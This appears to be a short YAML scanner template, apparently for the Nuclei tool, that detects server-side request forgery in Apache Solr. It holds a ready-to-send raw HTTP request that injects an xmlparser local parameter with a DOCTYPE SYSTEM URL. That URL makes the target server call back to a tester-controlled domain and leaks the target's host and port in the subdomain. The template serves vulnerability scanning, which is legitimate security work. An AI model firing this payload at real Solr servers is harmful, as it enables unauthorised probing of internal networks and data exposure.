id: ApacheSolr-SSRF-4

info:
  name: Apache Solr SSRF
  author: 0xAwali
  severity: critical
  description: Apache Solr SSRF Solr Local Parameters Injection , Commonly Bound Ports 8983
  reference:
      - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#solr
      - https://github.com/veracode-research/solr-injection
      

requests:
  - raw:
      - |
        GET /solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://{{Host}}.{{Port}}.{{Hostname}}.apachesolr.{{MY-DOMAIN}}/xxx"'><a></a>' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate